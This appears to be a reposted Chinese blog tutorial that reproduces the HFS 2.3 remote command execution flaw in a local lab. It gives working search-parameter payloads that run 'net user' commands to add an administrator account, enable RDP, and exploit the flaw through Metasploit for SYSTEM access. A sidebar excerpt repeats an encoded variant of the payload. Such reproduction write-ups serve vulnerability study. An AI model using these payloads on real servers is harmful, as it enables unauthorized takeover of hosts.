HFS远程命令执行漏洞复现

最新推荐文章于 2024-05-09 17:58:02 发布
最新推荐文章于 2024-05-09 17:58:02 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: # RCE 文章标签: 安全
原文链接:https://blog.csdn.net/qin9800/article/details/106403462/
版权

漏洞程序下载地址:Http File Server

这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。

运行程序截图如下
在这里插入图片描述
尝试访问该软件提供的web服务
在这里插入图片描述
web服务是这个样子的,这个web服务的搜索处存在漏洞

一、手工利用

payload如下

http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.} 
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}

    
    

    
    
  • 1
  • 2

完整利用过程如下
使用如下payload添加一个管理员账户

http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.} 

    
    

    
    
  • 1

添加用户:hack
密码:123
在这里插入图片描述
将用户hack添加到Administrators组。

http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}

    
    

    
    
  • 1

在这里插入图片描述
开启3389远程端口
在这里插入图片描述
使用远程连接工具连接,连接成功。
在这里插入图片描述

2、使用msf利用

启动Metasploit,搜索hfs漏洞利用模块
在这里插入图片描述
加载模块,并设置目标IP
在这里插入图片描述
设置payload,以及本机IP
在这里插入图片描述
开始执行
在这里插入图片描述
成功获得system权限
在这里插入图片描述

zxl2605
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
HFS 快速搭建 http 服务器
UsamaBinLaden6976498的专栏
10-25 2357
十 执 行 /usr/bin/hfsFolder/node-v20.9.0-linux-x64/bin/npx -y。十一 编写脚本文件/etc/systemd/system/hfs.service 将 hfs 配置为守护进程。六 查看点前在运行的 hfs 服务的配置文件 $HOME/.hfs/config.yaml。六 查看点前在运行的 hfs 服务的配置文件 $HOME/.hfs/config.yaml。七 把 nodejs 的二进制包解压至 /usr/bin/hfsFolder/
如何将本地HFS文件共享服务发布到公网并实现远程上传下载内网文件
最新发布
m0_59281987的博客
05-09 570
本文主要介绍如何在Windows系统电脑使用HFS并结合cpolar内网穿透工具搭建低成本NAS,并实现使用公网地址远程访问管理本地局域网电脑存储的文件。云存储作为一个新概念,在前些年炒的火热,虽然伴随一系列黑天鹅事件,让热度快速下降,但云存储带来的方便深入人心。因此在大厂的云存储产品热度下降后,私人的NAS热度快速上升,其中最具代表性的,必然是群晖NAS。但群晖价格太高,个人和小型企业无法承担。实际上,我们完全可以使用cpolar,与特定软件配合,打造属于自己的低成本NAS。
18-csrf漏洞及ssrf漏洞
qq_56414082的博客
03-27 538
跨站请求攻击,简单地说,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。比如: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。
安全开发-HFS漏洞利用脚本编写
niqiu320的博客
05-12 948
0x01 安全开发-HFS漏洞利用脚本编写 下载并在虚拟机2008里面(因为主机防火墙缘故)开启HFS~网络文件服务器 2.3Beta 一、攻击准备 复制HFS的IP在浏览器中,并且在IP后添加用户exp /?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20TechSupport%20admin.12345%20/add%20%26%20net%20localgroup%20administrators%20admin.12345%20/add.%7D
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 1700
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
HFS漏洞利用工具 e语言源码
03-08
HFS漏洞利用工具 e语言源码
HFS修复漏洞
09-20
HFS修复漏洞
HFS提权工具,hfs漏洞提权软件
12-10
HFS提权工具,hfs漏洞提权软件
HFS网络文件服务器
06-19
hfs网络文件服务器是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器。
HFS-网络文件服务器【中文版】
08-27
HFS-网络文件服务器【中文版】HFS网络文件服务器2.3完美汉化版
hfs可用简易服务器.rar
02-03
亲自测试过,非常好用的一款小型服务器,使用起来非常简单,可以自己用浏览器get数据, 也可以使用某些物联网产品get升级资源,我使用的是esp8266的OTA升级获取hfs本地服务的升级文件 测试好用。
HFS,超好用的本地文件分享利器
君一席
07-24 6199
原文地址:https://zhuanlan.zhihu.com/p/50220212 前言 我们经常需要将文件从电脑传输到手机、Pad 等移动设备查看使用,虽然通过 QQ 等传送文件也不错,但依赖于网速,而且大量文件的传输操作有点麻烦。 HTTP File Server (简称 HFS)是一款轻巧简单又功能完善的 HTTP 文件共享工具,可以让我们把电脑上的文件快速共享给局域网内的用户。类似局域网网盘,只要连在一个路由器上就可以访问,非常适合个人用户和家里使用。 HFS 使用方法 安装和界面介绍 HFS
秘密是如何被泄露的?自建文件分享神器HFS
asdaddsd的博客
04-29 1053
近年来,随着互联网技术的飞速发展,我们对于互联网的依赖也日益增加。然而,看似安全的聊天窗口,其实背后是庞大的互联网算力在维持运作,我们的每个行为,都会在互联网上留下痕迹,虽然各大厂商都有严格的保密措施来保守顾客的隐私,但我们的数据还会时有泄漏。2.非法网站木马纵横:互联网极其丰富,光是网站就数不胜数,除了正常的网站,还有许多非法网站钻了技术管理的空子,我们浏览网页时一旦不经意间进入了这样的网站,你的电脑或者手机将有很大的几率被植入木马,而通过木马控制你的设备甚至通过摄像头对你进行监视都是有可能的。
《杂记》- 之- 使用window下使用HFS服务器终端
qq_39257814的博客
10-03 3349
《杂记》- 之- 使用window下使用HFS服务器终端 前言:这次探讨的是使用免费的软件 做一个服务器端;即使用HFS(http file server)网络文件服务器搭建和穿透外网访问,实现,通过内网或外网访问服务器的文件。 一、软件准备: 1、下载HFS(http file server) :官网链接:HFS(http file server) 2、下载nat123:链接:nat123 HFS(http file server) :用以文件分享的设置 nat123:用以外网的映射,实现外网访问; 3、
hfs服务器不推送文件,hfs文件服务器linux
weixin_32440005的博客
08-06 387
hfs文件服务器linux 内容精选换一换本文介绍如何在 Linux 系统的本地机器上使用 FTP 服务,将文件从本地上传到云服务器中。已在待上传文件的云服务器中搭建 FTP 服务。如果您的云服务器为 Windows 操作系统,具体操作请参考 搭建FTP 站点(Windows)。如果您的云服务器为 Linux 操作系统,具体操作请参考 搭建FTP 站点(Linux)。Linux操安装传输工具在本地...
测试学习-测试工具wireshark、HFS、wlan信号
Princesk的博客
04-21 1372
1、Wireshark 网络封包分析软件。撷xie取网络封包,并尽可能显示出详细的网络封包资料 工作流程 (1)确定Wireshark的位置。如果没有一个正确的位置,启动Wireshark后会花费很长的时间捕获一些与自己无关的数据。 (2)选择捕获接口。一般都是选择连接到Internet网络的接口,这样才可以捕获到与网络相关的数据。否则,捕获到的其它数据对自己也没有任何帮助。 (3)使用捕获过滤器。通过设置捕获过滤器,可以避免产生过大的捕获文件。这样用户在分析数据时,也不会受其它数据干扰。而且,还可以为用户
hfs socket
07-28
对于您提到的 "hfs socket",我不太清楚具体指的是什么。"HFS" 可能是各种不同的含义,包括但不限于以下几种可能: 1. "HFS" 可能指 "Hierarchical File System",是一种在苹果电脑上常见的文件系统。它主要用于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值